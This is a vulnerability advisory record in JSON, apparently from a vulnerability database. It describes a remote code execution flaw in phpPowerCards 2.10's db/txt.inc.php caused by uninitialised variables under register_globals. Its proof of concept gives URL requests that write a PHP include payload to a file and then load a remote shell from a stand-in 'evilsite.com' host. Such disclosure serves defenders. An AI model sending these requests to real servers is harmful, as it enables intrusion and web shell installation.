DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURITYVULNS:DOC:14803", "bulletinFamily": "software", "title": "phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability", "description": "+-------------------------------------------------------------------------------------------\r\n+ phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability\r\n+-------------------------------------------------------------------------------------------\r\n+ Affected Software .: phpPowerCards 2.10\r\n+ Vendor ............: http://www.giombetti.com/\r\n+ Download ..........: http://lu.download.giombetti.com/phpPowerCards/phppowercards2.10.zip\r\n+ Description .......: "phpPowerCards is a powerfull PHP based postcard script."\r\n+ Class .............: Remote Code Execution\r\n+ Risk ..............: High (Remote Code Execution)\r\n+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>\r\n+-------------------------------------------------------------------------------------------\r\n+ Details:\r\n+ phpPowerCards db/txt.inc.php does not initialize the $file variable before using it in the\r\n+ fopen() function on line 10, after $file is opened it then writes several variables which\r\n+ are also uninitialized to $file using the fputs() function. Assuming register_globals = on,\r\n+ we can initialize these variables in a query string and then write anything to a file we\r\n+ desire on the target box that's running phpPowerCards.\r\n+ \r\n+ Vulnerable Code:\r\n+ db/txt.inc.php, line(s) 10: $fp = fopen("$file","a");\r\n+ db/txt.inc.php, line(s) 23: fputs($fp, $email[to]. "\u00a6\u00a6" .$email[from]. "\u00a6\u00a6" .$name[to]. "\u00a6\u00a6" .$name[from]. "\u00a6\u00a6" .$picture. "\u00a6\u00a6" .$comment. "\u00a6\u00a6" .$sessionID. "\n");\r\n+ \r\n+ Proof of Concept:\r\n+ http://[target]/[path]/db/txt.inc.php?file=[file]&check=0&email[to]=[evil code]\r\n+ http://[target]/[path]/db/txt.inc.php?file=[file]&check=0&comment=[evil code]\r\n+ ... same thing repeated for each variable in the second argument of fputs() on line 23\r\n+ \r\n+ -> http://[target]/[path]/db/txt.inc.php?file=../evilfile.php&check=0&email[to]=+%3C%3Fphp+include%28%24evil_include%29%3B+%3F%3E+\r\n+ -> http://[target]/[path]/evilfile.php?evil_include=http://evilsite.com/shell.php\r\n+-------------------------------------------------------------------------------------------\r\n\r\n# milw0rm.com [2006-10-18]\r\n\r\n", "published": "2006-10-23T00:00:00", "modified": "2006-10-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14803", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 46, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6742"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6742"]}]}, "exploitation": null, "vulnersScore": 0.1}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645592287, "score": 1659803227}, "_internal": {"score_hash": "b99405324dfc3bdc07a28a3d9b41f02d"}}

{}